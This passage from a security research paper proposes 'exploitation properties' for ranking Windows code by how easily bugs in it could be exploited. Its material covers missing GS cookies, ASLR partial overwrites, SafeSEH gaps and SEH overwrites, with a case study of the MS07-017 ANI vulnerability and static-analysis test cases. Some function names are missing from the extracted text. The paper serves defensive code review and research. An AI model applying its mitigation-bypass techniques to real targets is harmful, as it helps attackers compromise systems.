encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact
|
||||
that there have been very few public exploits that have been able to
|
||||
universally bypass all of these mitigations at once is a testament to the
|
||||
resilience of these techniques working in concert with one another. It is
|
||||
obvious that the absence of a given mitigation directly contributes to the
|
||||
exploitability of the associated code. Likewise, it is also well known that
|
||||
most mitigations have situations in which they will offer little to no
|
||||
protection[5, 16, 18, 20, 2, 4]. For instance, in certain cases, it may be
|
||||
possible to perform a partial overwrite on Windows Vista to defeat ASLR due to
|
||||
the fact that only 15 bits of most 32-bit addresses may be affected by
|
||||
randomization[2, 17]. Other mitigations also have situations where they may
|
||||
not provide adequate coverage.
|
||||
|
||||
Given the fact that the majority of mitigations have known limitations, it
|
||||
makes sense to consider where this information might be useful. In the field
|
||||
of program analysis, whether it be manual, static, or dynamic, the question of
|
||||
scoping is often pertinent. This question typically revolves around figuring
|
||||
out what areas of code should be reviewed and what precedence, if any, should
|
||||
be assigned to different regions. Typical approaches taken to accomplish this
|
||||
often involve identifying code that straddles a trust boundary or performs
|
||||
complex operations reachable from a trust boundary. However, depending on
|
||||
one's perspective, this type of approach is insufficient in the face of modern
|
||||
mitigations because it may result in areas of code being reviewed that are
|
||||
adequately protected by all mitigations.
|
||||
|
||||
To help address this perceived deficiency, this paper introduces the concept
|
||||
of exploitation properties and describes how they can be used to provide a
|
||||
better understanding of exploitability of a system if a vulnerability is found
|
||||
to be present. Regions of code that are found to have a number of distinct
|
||||
exploitation properties may be more interesting from an exploitation
|
||||
standpoint and therefore may warrant additional scrutiny from a program
|
||||
analysis perspective. The use of exploitation properties may benefit both an
|
||||
attacker and a defender. For example, companies may wish to perform targeted
|
||||
reviews on areas of code that may be more trivially exploited in an effort to
|
||||
prevent reliable exploits from being released in the future. Likewise, an
|
||||
attacker searching for a vulnerability may wish to avoid auditing regions of
|
||||
code that are likely to be more difficult to exploit.
|
||||
|
||||
Exploitation properties represent additional criteria that can be used when
|
||||
attempting to better understand the security aspects of a program. Annotating
|
||||
regions of code with exploitation properties makes it possible to use set
|
||||
unions and intersections to identify the subset of interesting regions of code
|
||||
for a particular analysis problem. For example, an attacker may wish to
|
||||
determine the regions of code that may permit the use of traditional
|
||||
stack-based buffer overflow techniques as well as permitting a partial
|
||||
overwrite of a return address in order to defeat ASLR. Using these two
|
||||
exploitation properties as criteria, a narrowed subset can be produced
|
||||
which contains only those regions which meet both criteria by intersecting
|
||||
those regions that have both exploitation properties. For the purpose of
|
||||
this paper, the term narrowing is not used in the strict mathematical
|
||||
sense; rather, this paper uses narrowing to describe the process of
|
||||
constraining the scope of analysis through the use of specific criteria.
|
||||
|
||||
The concept of using automated analysis as a precursor to more strenuous
|
||||
program analysis is certainly not new. There have been many tools ranging
|
||||
from the simple detection of calls to strcpy to much more sophisticated forms
|
||||
of static analysis. Still, the use of exploitation properties can be seen as
|
||||
an additional set of data points which may be useful in the context of program
|
||||
analysis given the hypothesis that most reliably exploitable security
|
||||
vulnerabilities are being pushed into areas of code that are less affected by
|
||||
mitigations.
|
||||
|
||||
The concept of exploitation properties is presented as follows. Section 2
|
||||
categorizes and defines a limited number of concrete exploitation properties.
|
||||
Section 3 provides a concrete example of using exploitation properties to help
|
||||
identify the function that contained the ANI vulnerability. Section 4
|
||||
describes some potential ways in which exploitation properties can be applied.
|
||||
Section 5 gives a brief description of future work involving exploitation
|
||||
properties.
|
||||
|
||||
2) Exploitation Properties
|
||||
|
||||
Exploitation properties describe the ease with which an arbitrary
|
||||
vulnerability might be exploited. An understanding of a system's perceived
|
||||
exploitability can provide useful insights when attempting to establish the
|
||||
risk factors associated with it. An example of this can be seen in threat
|
||||
modeling where the DREAD model of classifying risk includes a high-level
|
||||
evaluation of exploitability as one of the risk factors[14]. It is important
|
||||
to note that exploitation properties do not provide any indication that a
|
||||
vulnerability exists; instead, they are only meant to convey information about
|
||||
how easily a vulnerability could be exploited. The concept of an exploitation
|
||||
property can be broken into different categories which are tied to the
|
||||
configuration or context that the property is associated with. Examples of
|
||||
these categories include platforms, processes, binary modules, functions, and
|
||||
so on.
|
||||
|
||||
The following subsections provide concrete examples to better illustrate the
|
||||
concept of an exploitation property. These examples are given by showing what
|
||||
implications a property has with respect to exploitation as well as how a
|
||||
property might be derived. It should be noted that the examples given in this
|
||||
paper do not represent a complete, exhaustive set of exploitation properties.
|
||||
|
||||
2.1) Platform Properties
|
||||
|
||||
Exploitation properties associated with a platform are meant to illustrate how
|
||||
easily a vulnerability may be exploited when a given platform configuration,
|
||||
such as the operating system or architecture, is used. For example, Windows
|
||||
2000 does not include support for enforcing non-executable pages. This
|
||||
implies that any vulnerability found within an application that runs in the
|
||||
context of the Windows 2000 platform may be exploited more easily. An
|
||||
understanding of exploitation properties that are associated with a platform
|
||||
may be useful when attempting to assess the risk of applications that might
|
||||
run on multiple platforms. There are many other examples of exploitation
|
||||
properties that are tied to platforms. In order to limit the scope of this
|
||||
document, platform exploitation properties are not discussed at length.
|
||||
|
||||
2.2) Process Properties
|
||||
|
||||
Process exploitation properties carry some information about how easily
|
||||
vulnerabilities found within the context of a running process may be
|
||||
exploited. For example, Internet Explorer running on 32-bit versions of
|
||||
Windows Vista do not make use of hardware-enforced DEP (NX) by default. This
|
||||
means that any vulnerabilities found within code that runs in the context of
|
||||
Internet Explorer will not be protected by non-executable regions. An
|
||||
understanding of exploitation properties that are associated with a process
|
||||
context can help to provide a better understanding of the risks associated
|
||||
with code that may run in the context of a given process. In order to limit
|
||||
the scope of this document, process exploitation properties are not discussed
|
||||
at length.
|
||||
|
||||
2.3) Module Properties
|
||||
|
||||
Module exploitation properties are used to illustrate the effect that a
|
||||
particular binary module has on ease of exploitation. This category of
|
||||
properties is useful when attempting to identify binaries that may be more
|
||||
easily exploited if a vulnerability is found within them or in code that
|
||||
depends on them. This subsection describes two examples of module
|
||||
exploitation properties.
|
||||
|
||||
2.3.1) No Support for ASLR
|
||||
|
||||
Windows Vista was the first major release of Windows to include a built-in
|
||||
implementation of Address Space Layout Randomization (ASLR)[15,24]. In order
|
||||
to head off potential application compatibility issues, Microsoft chose to
|
||||
make ASLR an opt-in feature by requiring binaries to be compiled with a new
|
||||
compiler switch (/dynamicbase)[21]. This compiler switch is responsible for
|
||||
setting a bit (0x40) in the DllCharacteristics that are defined within a
|
||||
binary. If this bit is set, the Windows kernel will attempt to randomize the
|
||||
base address of the binary when it is mapped into memory the first time. If
|
||||
the bit is not set, the binary will not have its base address randomized,
|
||||
although it could be relocated in memory if the binary's preferred region is
|
||||
already occupied by another allocation. As such, any binary that does not
|
||||
support ASLR may be mapped at a predictable location within a process address
|
||||
space at execution time. This can allow an attacker to make assumptions about
|
||||
the address space which may make exploitation easier if a vulnerability is
|
||||
found within any code that is mapped into the same address space as the module
|
||||
of interest.
|
||||
|
||||
2.3.2) No Support for SafeSEH
|
||||
|
||||
With Visual Studio 2003, Microsoft introduced a compile-time change known as
|
||||
SafeSEH which attempts to act as a mitigation for the SEH overwrite attack
|
||||
vector[5,9]. SafeSEH works by adding a static list of known good exception
|
||||
handlers that are considered valid as metadata within a given binary.
|
||||
Binaries that support SafeSEH allow the exception dispatcher to perform
|
||||
additional checks when dispatching exceptions. The most important check
|
||||
involves determining if an exception handler that is found to exist within the
|
||||
mapped region of a given binary is actually considered to be one of the safe
|
||||
exception handlers. If the exception handler is not a safe exception handler,
|
||||
the exception dispatcher can take steps to prevent it from being called. This
|
||||
behavior works to mitigate the potential exploitation vector.
|
||||
|
||||
In order to communicate this information to the exception dispatcher, modern
|
||||
PE files include fields in the load config data directory which hold the
|
||||
offset of the safe exception handler table and the number of elements found
|
||||
within the table. The load config data directory contains meta data that is
|
||||
useful to the dynamic loader such as information about safe exception
|
||||
handlers, the module's global security cookie address, and so on[13]. The
|
||||
following output from dumpbin.exe illustrates what this might look like:
|
||||
|
||||
310751E0 Safe Exception Handler Table
|
||||
1 Safe Exception Handler Count
|
||||
|
||||
Safe Exception Handler Table
|
||||
|
||||
Address
|
||||
--------
|
||||
310357D1 __except_handler4
|
||||
|
||||
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
|
||||
unless every binary that is loaded into an address space has been compiled to
|
||||
make use of SafeSEH. If a binary has not been compiled to make use of
|
||||
SafeSEH, an attacker may be able to use any address found within the binary's
|
||||
memory mapping as an exception handler in conjunction with an SEH overwrite.
|
||||
|
||||
2.4) Function Properties
|
||||
|
||||
Function exploitation properties convey information about how a function
|
||||
contributes to the exploitability of an application. For example, a function
|
||||
might make it possible to use certain exploitation techniques that might
|
||||
otherwise be prevented if mitigations were present. Alternatively, a function
|
||||
might simply assist in the exploitation process. Function exploitation
|
||||
properties are especially useful because they provide more detailed
|
||||
information than exploitation properties that are derived from the platform,
|
||||
process, or module context.
|
||||
|
||||
2.4.1) Absence of GuardStack
|
||||
|
||||
The GuardStack (GS) support included with versions of the Microsoft Visual
|
||||
Studio compiler since 2002 offers a compile-time mitigation to traditional
|
||||
stack-based buffer overflows[23]. It supports this through a combination of a
|
||||
random canary inserted into a stack frame at runtime and an intelligent stack
|
||||
frame layout algorithm. The random canary is pushed onto the stack when a
|
||||
function is called and then popped off the stack and validated prior to
|
||||
function return. If the canary does not match the expected value, it is
|
||||
assumed that a stack-based buffer overflow occurred and that the process
|
||||
should be terminated.
|
||||
|
||||
Since the initial release of GS support a number of techniques have been
|
||||
described that could be used to bypass or weaken it[5, 16, 20]. While these
|
||||
techniques were at one time useful or have not yet been fully realized, the
|
||||
author assumes that most would agree that the GS implementation provided by
|
||||
the most recent compiler is robust (with the exception of SEH). There is
|
||||
currently no publicly known universal bypass technique for GS that the author
|
||||
is aware of. Given this assumption, functions that are protected by GS become
|
||||
less interesting from the standpoint of identifying stack-based buffer
|
||||
overflows. On the other hand, functions that are not protected by GS can
|
||||
instantly be qualified as interesting targets for review. This is especially
|
||||
true with binaries that have been compiled with GS support but contain a
|
||||
number of functions that the compiler has chosen not to compile with GS
|
||||
protections. This choice is made by taking into account certain conditions such
|
||||
as the presence or absence of local variables that are declared as fixed-size
|
||||
arrays.
|
||||
|
||||
As previous research has illustrated[27], it is possible to identify functions
|
||||
that have not been compiled to use GS through the use of simple static
|
||||
analysis tools. It is also possible to further refine the approaches
|
||||
described in previous research if one has symbols and one assumes that the
|
||||
most recent compiler was used. This can be accomplished by analyzing the call
|
||||
graph of an executable and noting the set of functions that do not call
|
||||
securitycheckcookie. Considered another way, the same set of functions can be
|
||||
identified by taking the set of all functions contained within a binary less
|
||||
the subset that call securitycheckcookie. The set of functions that is
|
||||
identified by either approach can be annotated with an exploitation property
|
||||
that indicates that they may contain stack-based buffer overflows that would
|
||||
not be hindered by GS.
|
||||
|
||||
It may also be prudent to take the compiler version that was used into
|
||||
consideration when analyzing binaries. This is important due to the fact that
|
||||
older versions of the compiler used a GS implementation that could be
|
||||
trivially defeated in certain circumstances[16]. For example, previous versions
|
||||
of GS did not layout the stack frame in a manner that would prevent an
|
||||
attacker from overwriting other local variables and function arguments. In
|
||||
scenarios where this occurred and an overwritten local variable or parameter
|
||||
was dereferenced (such as by invoking a function pointer), the mitigation
|
||||
offered by GS would be meaningless. Thus, a secondary exploitation property
|
||||
could involve identifying functions where attacks such as the one described
|
||||
above could be possible.
|
||||
|
||||
2.4.2) Partial Overwrite Feasibility
|
||||
|
||||
One of the unique consequences of implementing Address Space Layout
|
||||
Randomization (ASLR) on Windows is the limitation that the system allocation
|
||||
granularity imposes on the number of bits that can be randomized within most
|
||||
memory allocations. In particular, the allocation granularity used by Windows
|
||||
enforces strict 16-page alignment for the base addresses of most memory
|
||||
mappings in user-mode. This restriction means that it is only possible to
|
||||
introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit
|
||||
memory mapping[17]. While this may sound odd at first glance, the high-order two
|
||||
bits are not randomized due to the divide between kernel and user-mode. This
|
||||
assumes that a machine is booted without /3GB. The low-order 16 bits remain
|
||||
unchanged relative to the high-order bits. This caveat means that it may be
|
||||
possible to perform a partial overwrite of an address and thus bypass the
|
||||
security features offered by ASLR[2]. However, the ability to perform a partial
|
||||
overwrite also relies on the presence of useful code or data within a region
|
||||
that is relative to the address that is being overwritten.
|
||||
|
||||
To visualize how this type of information might be useful, consider a scenario
|
||||
where an attacker is performing a partial overwrite of a return address on the
|
||||
stack. In this situation, it is often necessary for one or more useful
|
||||
opcodes to be present at an address that is 16-page relative to the return
|
||||
address. For example, consider a scenario where the function may have a
|
||||
vulnerability that would permit a partial overwrite. In this example, is
|
||||
called by and . In order to permit the use of a partial overwrite, a useful
|
||||
opcode must be found within the same 16-page aligned region that either or
|
||||
reside on. If a useful opcode is present, an exploitation property can be
|
||||
attached to in order to indicate that a partial overwrite may be feasible due
|
||||
to the presence of a useful opcode within the same 16-page aligned region as
|
||||
either or . For example, consider the following pseudo-disassembly
|
||||
illustrating a case where the call f instruction in is on the same 16-page
|
||||
region as a useful opcode:
|
||||
|
||||
... useful jmp on same 16-page region 0x14c1XXXX
|
||||
0x14c1fc04 jmp esp
|
||||
... entry point to h()
|
||||
0x14c1a910 push ebp
|
||||
0x14c1a911 mov ebp, esp
|
||||
0x14c1a914 call f
|
||||
... entry point to y(), not on same 16-page region
|
||||
0x137f44c8 push ebp
|
||||
|
||||
While this captures the basic concept, a better approach might be to view a
|
||||
binary in a different way. For example, consider the following approach to
|
||||
drawing the same conclusion: for each code region that contains a useful
|
||||
opcode, identify the subset of functions that are called from call sites
|
||||
within the same 16-page aligned region as the useful opcode. This has the
|
||||
effect of annotating all of the child functions that could potentially
|
||||
leverage a partial overwrite of the return address with respect to a
|
||||
particular collection of opcodes.
|
||||
|
||||
One important point that must be made about this exploitation property is that
|
||||
is entirely dependent upon the definition of "useful code or data".
|
||||
Exploitation is very much an art and it goes without saying that attempting to
|
||||
constrain the approaches that an attacker might make use of is likely to be
|
||||
folly. However, defining a known-set of useful opcodes and using that set as
|
||||
a base with which to draw the above conclusion can be said to be better than
|
||||
not doing so at all.
|
||||
|
||||
2.4.3) Function or Parent Registers an Exception Handler
|
||||
|
||||
One of the unique exploitation vectors that exists in 32-bit programs that run
|
||||
on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it possible
|
||||
to gain control of execution flow by overwriting an exception registration
|
||||
record on the stack. From an exploitation perspective, the act of registering
|
||||
an exception handler within a function opens up the possibility of making use
|
||||
of an SEH overwrite. Since exception handlers are chained, the act of
|
||||
registering an exception handler also implicates any functions that are
|
||||
children of a function that registers the exception handler. This makes it
|
||||
possible to define an exploitation property that illustrates the possibility
|
||||
of an SEH overwrite being abused within the scope of a specific set of
|
||||
functions. Detecting this property can be as simple as signaturing the
|
||||
compiler generated code that is used to generate and register an exception
|
||||
handler within a function. An example of two functions, and , that would
|
||||
meet this criteria can be seen below:
|
||||
|
||||
void f() {
|
||||
__try {
|
||||
g();
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER) {
|
||||
}
|
||||
}
|
||||
|
||||
void g() {
|
||||
...
|
||||
}
|
||||
|
||||
In addition to this information being useful from an SEH overwrite
|
||||
perspective, it may also benefit an attacker in situations where an exception
|
||||
handler simply swallows any exceptions that are dispatched without crashing
|
||||
the process[1]. In the example given above, any exception that occurs in the
|
||||
context of will be swallowed by without necessarily crashing the process.
|
||||
This behavior may allow an attacker to retry their exploitation attempt
|
||||
multiple times, thus enabling a bruteforce attack that would otherwise not be
|
||||
feasible. This can make defeating ASLR more feasible.
|
||||
|
||||
2.4.4) Function is an Exception Handler
|
||||
|
||||
The introduction of SafeSEH as a modern compile-time mitigation has caused the
|
||||
particulars of how exception handlers are implemented to become more
|
||||
interesting. This has to do with the fact that SafeSEH restricts the set of
|
||||
exception handlers that may be called by the exception dispatcher to those
|
||||
that are specified as being valid within the scope of a given binary. As
|
||||
discussed previously in this paper, SafeSEH prevents traditional SEH
|
||||
overwrites from being able to use any address as the overwritten exception
|
||||
handler. While this is effective in its primary intent, there is still the
|
||||
possibility that a valid exception handler can be abused to make exploitation
|
||||
more feasible[1]. This scenario is restricted to EH3 and prior exception
|
||||
handlers as EH4 includes a check of a cookie before dispatching exceptions.
|
||||
As such, it may be useful to flag the regions of code that are associated with
|
||||
EH3 and prior exception handlers, including language-specific exception
|
||||
handlers, as being potentially interesting from an exploitation perspective.
|
||||
|
||||
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
|
||||
unless every binary that is loaded into a process address space has been
|
||||
compiled to make use of SafeSEH. If a binary has not been compiled to make
|
||||
use of SafeSEH, an attacker may be able to use any address found within the
|
||||
binary's memory mapping as an exception handler in the context of an SEH
|
||||
overwrite. This may make exploitation more feasible.
|
||||
|
||||
3) Case Study: MS07-017
|
||||
|
||||
The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov in
|
||||
late 2006 and patched by Microsoft with the MS07-017 critical update in April,
|
||||
2007 . Apart from being a client-side vulnerability that was exposed through
|
||||
web-browsers and other mediums, the ANI vulnerability was one of the first
|
||||
notable security issues that affected Windows Vista. It was notable due to
|
||||
the simple fact that even though Microsoft had touted Windows Vista as being
|
||||
the most secure operating system to date, the exploits that were released for
|
||||
the ANI vulnerability were very reliable. These exploits were able to ignore
|
||||
or defeat the protections offered by mitigations such as GS, DEP, and even
|
||||
Vista's newest mitigation: ASLR.
|
||||
|
||||
To better understand how this was possible it is important to dive deeper into
|
||||
the details of the vulnerability itself. gives a brief description of the
|
||||
ANI vulnerability and some of the techniques that were used to successfully
|
||||
exploit it. Following this description, illustrates how exploitation
|
||||
properties, in combination with another class of properties, can be used to
|
||||
detect functions that may contain vulnerabilities similar to the ANI
|
||||
vulnerability. This is meant to help illustrate the perceived benefits of
|
||||
applying the concept of exploitation properties to aide in the process of
|
||||
identifying regions of code that may deserve additional scrutiny based on
|
||||
their perceived exploitability.
|
||||
|
||||
3.1) Background
|
||||
|
||||
While the ANI vulnerability was certainly unique, it was not the first time
|
||||
the animated cursor code was found to have a security issue. Microsoft patched
|
||||
an issue that was almost exactly the same as MS07-017 with MS05-002 roughly
|
||||
two years prior. In both cases, the underlying security issue was related to
|
||||
a failure to properly validate input that was derived from the contents of an
|
||||
animated cursor file. Alexander Sotirov provided much of the initial research
|
||||
on the ANI vulnerability and also gave an excellent write-up to its effect[22].
|
||||
This paper will only attempt to highlight the flaw.
|
||||
|
||||
The vulnerability itself was found in user32!LoadAniIcon which is responsible
|
||||
for processing a number of different chunks that may be contained within an
|
||||
animated cursor file. Each chunk is a TLV (Type-Length-Value) as described
|
||||
by the following structure:
|
||||
|
||||
struct ANIChunk
|
||||
{
|
||||
char tag[4]; // ASCII tag
|
||||
DWORD size; // length of data in bytes
|
||||
char data[size]; // variable sized data
|
||||
}
|
||||
|
||||
Keeping this structure in mind, the flaw itself can be seen in the abbreviated
|
||||
pseudo-code below as modified slightly from Sotirov's original write-up:
|
||||
|
||||
01: int LoadAniIcon(struct MappedFile* file, ...) {
|
||||
02: struct ANIChunk chunk;
|
||||
03: struct ANIHeader header; // 36 byte structure
|
||||
04: while (1) {
|
||||
05: // read the first 8 bytes of the chunk
|
||||
06: ReadTag(file, &chunk);
|
||||
07: switch (chunk.tag) {
|
||||
08: case 'anih':
|
||||
09: // read chunk.size bytes into header
|
||||
10: ReadChunk(file, &chunk, &header);
|
||||
|
||||
On line 6, the chunk header is read into the local variable chunk using
|
||||
ReadTag which populates the chunk's tag and size fields. If the chunk's tag
|
||||
is equal to 'anih', the data associated with the chunk is read into the header
|
||||
local variable using ReadChunk on line 10. The problem is that ReadChunk uses
|
||||
the size field of the chunk as the amount of data to read from the file.
|
||||
Since header is a fixed-size (36 byte) data structure and the chunk's size can
|
||||
be variable, a trivial stack-based buffer overflow may occur if more than 36
|
||||
bytes are specified as the chunk size. In terms of the vulnerability, that's
|
||||
all there is to it, but the implications from an exploitation perspective are
|
||||
where things start to get interesting.
|
||||
|
||||
When attempting to exploit this vulnerability it may at first appear that all
|
||||
attempts to do so would be futile. Given Vista's security push, an attacker
|
||||
would be justified in thinking that surely the LoadAniIcon function is
|
||||
protected by a GS cookie. This point is especially justified considering the
|
||||
majority of all binaries shipped with Windows Vista have been compiled with GS
|
||||
enabled[27]. However, there are indeed circumstances where the compiler will
|
||||
choose to not enable GS for a specific function. As chance would have it, the
|
||||
compiler chose not to enable GS for the LoadAniIcon function because of the
|
||||
simple fact that it does not contain any characteristics that would suggest
|
||||
that a stack-based buffer overflow might be possible (such as the use of
|
||||
stack-allocated arrays). This means that an attacker is able to make use of
|
||||
exploitation techniques that are associated with traditional stack-based
|
||||
buffer overflows. While this drastically increases the chances of being able
|
||||
to produce a reliable exploit, there are still other mitigations that are of
|
||||
potential concern.
|
||||
|
||||
Another mitigation that might be concerning in most circumstances is
|
||||
hardware-enforced DEP (NX). This would generally prevent an attacker from
|
||||
being able to run arbitrary code within regions that are not marked as
|
||||
executable (such as the stack and the heap). However, as fate would have it,
|
||||
Internet Explorer is configured to not run with DEP enabled. This immediately
|
||||
removes this concern from the equation for exploits that attempt to trigger
|
||||
the ANI vulnerability through Internet Explorer. With DEP out of the picture,
|
||||
ASLR becomes a weakened but still potentially significant hurdle.
|
||||
|
||||
While it may appear that ASLR would be challenging to defeat in most
|
||||
circumstances, this particular vulnerability provides an example of two
|
||||
different ways in which ASLR can be bypassed. The simplest approach, as taken
|
||||
by Sotirov, involves making use of the fact that Internet Explorer is not
|
||||
compiled with support for ASLR and therefore can be found at a fixed address
|
||||
within the address space. This allows an attacker to make use of opcodes
|
||||
contained within iexplore.exe's memory mapping. A second approach, as taken
|
||||
by the author, involves using a partial overwrite to ignore the effects of
|
||||
ASLR completely. The details relating to how a partial overwrite works were
|
||||
explained in 2.4.2. In either case, an attacker is able to reliably defeat Vista's
|
||||
ASLR.
|
||||
|
||||
To compound the problem, the particulars of the context in which this
|
||||
vulnerability occur make it easier to exploit even without the presence of
|
||||
mitigations. This improved reliability comes from the fact that the
|
||||
LoadAniIcon function is wrapped in an exception handling context that simply
|
||||
swallows exceptions that are encountered. This makes it possible for an
|
||||
exploit to fail without actually crashing the process, thus allowing the
|
||||
attacker to try multiple times without having to worry about making a mistake
|
||||
that crashes the process. When all is said and done, the simplicity of the
|
||||
vulnerability and the ease with which mitigations could be bypassed are what
|
||||
lead to the ANI vulnerability being quite unique. Given the fact that this
|
||||
vulnerability can be so easily exploited, it is prudent to describe how it
|
||||
could have been detected as being a high risk function.
|
||||
|
||||
3.2) Detection
|
||||
|
||||
The ease of exploitability associated with the ANI vulnerability makes it an
|
||||
obvious candidate for study with respect to the exploitation properties that
|
||||
have been described in this paper. It should be possible to use extremely
|
||||
simple criteria to accomplish two things. First, the criteria must identify
|
||||
the LoadAniIcon function. Second, the criteria should be unique enough to
|
||||
limit the size of the narrowed subset. Reducing the subset size is beneficial
|
||||
as it may permit the use of more complex program analysis tools which can
|
||||
further constrain or explicitly identify instances of vulnerabilities.
|
||||
Determining the specific criteria that is needed to identify the LoadAniIcon
|
||||
function can help illustrate how one can make use of exploitation properties.
|
||||
Given the description of the ANI vulnerability, one can easily deduce some of
|
||||
the more interesting properties that it has.
|
||||
|
||||
An exploitation property that one might immediately observe is that the
|
||||
LoadAniIcon function does not make use of GS (2.4.1). This makes it possible to
|
||||
define criteria which states that only functions that have not been compiled
|
||||
with GS should be considered. Functions that have been compiled with GS are
|
||||
inherently less interesting for the purpose of this exercise due to the fact
|
||||
that they are less likely to contain exploitable vulnerabilities.
|
||||
|
||||
A second property that the ANI vulnerability had with regard to exploitation
|
||||
was that it was possible for an attacker to make use of a partial overwrite to
|
||||
defeat ASLR. The exploitation property described in 2.4.2 illustrates how one can
|
||||
make this determination statically. In the case of the ANI vulnerability, a
|
||||
partial overwrite can be performed by making use of a jmp [ebx] that is
|
||||
located within the same 16-page aligned region as the caller of LoadAniIcon.
|
||||
Thus, any functions that could potentially make use of a partial overwrite can
|
||||
be used as additional criteria.
|
||||
|
||||
At this point, a subset can be produced that is constrained to the regions of
|
||||
code that are annotated with the GS and partial overwrite exploitation
|
||||
properties. It is possible to further refine the set of functions that should
|
||||
ultimately be considered by studying the form that the ANI vulnerability took.
|
||||
The first point to note is that the stack-based buffer overflow occurred when
|
||||
writing beyond the bounds of a struct that was allocated on the stack.
|
||||
Furthermore, the overflow did not actually occur in the immediate context of
|
||||
the LoadAniIcon itself. Instead, the overflow was triggered by passing a
|
||||
pointer to the stack-allocated struct as a parameter when calling the function
|
||||
ReadChunk.
|
||||
|
||||
Based on these data points it is possible to define a third criteria. In this
|
||||
case, the third criteria is not an exploitation property but is instead an
|
||||
example of a vulnerability property. While not discussed in detail in this
|
||||
paper, many examples of vulnerability properties exist, though perhaps not
|
||||
categorized as such. A vulnerability property can be thought of as an
|
||||
annotation that illustrates whether or not a region of code has a form that is
|
||||
similar to that seen in vulnerabilities or has the potential of being a
|
||||
vulnerability. The complexity of a vulnerability property, as with the
|
||||
complexity of an exploitation property, can range from highly sophisticated to
|
||||
very simplistic.
|
||||
|
||||
For the purpose of this paper, a vulnerability property can be used that is
|
||||
very simple and imprecise but nevertheless effective at further narrowing the
|
||||
set of functions that should be reviewed. This property is based on whether
|
||||
or not a function passes a pointer to a stack-allocated variable as a
|
||||
parameter to a child function. This property is directly derived from the
|
||||
general form that the ANI vulnerability takes. At a minimum, a region of code
|
||||
that matches this form suggests that a vulnerability could be present.
|
||||
|
||||
Using these three properties, it should be possible to easily identify both
|
||||
the function that contains the ANI vulnerability as well as other functions
|
||||
that could contain similar vulnerabilities. However, it is important to note
|
||||
that this process does not produce functions that definitely have
|
||||
vulnerabilities. This can be plainly seen by the fact that both the
|
||||
vulnerable and fixed versions of the LoadAniIcon should be detected by the
|
||||
criteria described above. While this may seem to run counter to the purposes
|
||||
of this paper, it is important for the reader to remember that the goal of
|
||||
using these exploitation properties is not to identify specific instances of
|
||||
vulnerabilities. Instead, the goal is to identify regions of code that might
|
||||
warrant additional scrutiny due to the relative ease with which a
|
||||
vulnerability could be exploited if one is found to be present.
|
||||
|
||||
3.3) Test Case
|
||||
|
||||
The author developed an analysis tool as an extension to Microsoft's Phoenix
|
||||
framework in order to test the ideas described in this paper[12]. Unfortunately,
|
||||
the current release (July 2007 SDK) of Phoenix requires private symbol
|
||||
information for native binaries. This limitation prevented the author from
|
||||
being able to run the analysis tool across the vulnerable version of
|
||||
user32.dll. In lieu of this ability, the author chose to generate a binary
|
||||
containing test cases that closely mirror the form of the function containing
|
||||
the ANI vulnerability.
|
||||
|
||||
Using these test cases, the author used the features provided by the analysis
|
||||
tool to determine the exploitation and vulnerability properties described in
|
||||
the previous section and to identify the resulting subset of functions meeting
|
||||
all criteria. This was accomplished by first attempting to identify the
|
||||
subset of functions that do not contain GS within the scope of the target
|
||||
binary. After identifying the subset of functions without GS, a second subset
|
||||
was taken which consists of the functions that pass a pointer to a
|
||||
stack-allocated local variable as a parameter to a child routine. This was
|
||||
accomplished by using Phoenix's static single assignment (SSA) and alias
|
||||
implementations to collect the requisite data flow information[12,25]. Using this
|
||||
data flow information, it is possible to perform backwards data flow analysis
|
||||
to determine the potential storage location of the parameter being passed at
|
||||
each point along a given data flow path starting from the operand associated
|
||||
with a parameter at a call site. The analysis terminates either when a fixed
|
||||
point is reached or when it is determined that a pointer to a stack-allocated
|
||||
variable could be passed as the parameter.
|
||||
|
||||
While the previous section described the potential for using the partial
|
||||
overwrite exploitation property to detect the function containing the ANI
|
||||
vulnerability[6], it is not possible to create a meaningful parallel between the
|
||||
test binary and that of the ANI vulnerability. This is due in part to the
|
||||
fact that while it would certainly be possible to artificially place a useful
|
||||
opcode at a specific location in the test binary, it would not add any value
|
||||
beyond showing that it is possible to detect useful opcodes within the same
|
||||
16-page aligned region as the caller of a given function. The author feels
|
||||
that this point is somewhat moot given the fact that it has already been
|
||||
proven that a partial overwrite can be used with the ANI vulnerability. The
|
||||
only additional benefit that it could offer in this case would be to help
|
||||
further constrain the resultant set size. However, without being able to run
|
||||
this analysis against the vulnerable version of user32.dll, it is not possible
|
||||
to draw meaningful conclusions at this point in time.
|
||||
|
||||
3.4) Results
|
||||
|
||||
The results of running the analysis tool against the test binary produced the
|
||||
expected behavior. To illustrate this, it is helpful to consider a sampling
|
||||
of the functions that were analyzed. The following functions have a form that
|
||||
is similar to the ANI vulnerability. These functions also match the criteria
|
||||
described in the previous subsection. Specifically, these functions do not
|
||||
make use of GS and pass a pointer to a stack-allocated local variable (var) to
|
||||
a child function:
|
||||
|
||||
int tc_df_pass_local_ptr_to_callee() {
|
||||
int var;
|
||||
tc_df_pass_local_ptr_to_callee_func(&var);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_ptr_to_callee_alias() {
|
||||
int var;
|
||||
int *p = &var;
|
||||
tc_df_pass_local_ptr_to_callee_func(p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_ptr_to_callee_alias_struct(
|
||||
struct _foo *foo) {
|
||||
int var;
|
||||
foo->ptr = &var;
|
||||
return tc_df_pass_local_ptr_to_callee_func(
|
||||
foo->ptr);
|
||||
return 0;
|
||||
}
|
||||
|
||||
Additionally, a handful of different test functions were also included in the
|
||||
target binary in an effort to ensure that other scenarios were not improperly
|
||||
detected as matching the criteria. Some examples of these functions include:
|
||||
|
||||
int tc_df_pass_local_to_callee_alias() {
|
||||
int var = 2;
|
||||
int p = var;
|
||||
tc_df_pass_local_to_callee_func(p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_local_to_callee_deref() {
|
||||
int var = 2;
|
||||
int *p = &var;
|
||||
tc_df_pass_local_to_callee_func(*p);
|
||||
return 0;
|
||||
}
|
||||
int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) {
|
||||
tc_df_pass_local_ptr_to_callee_func(&foo->val);
|
||||
return 0;
|
||||
}
|
||||
|
||||
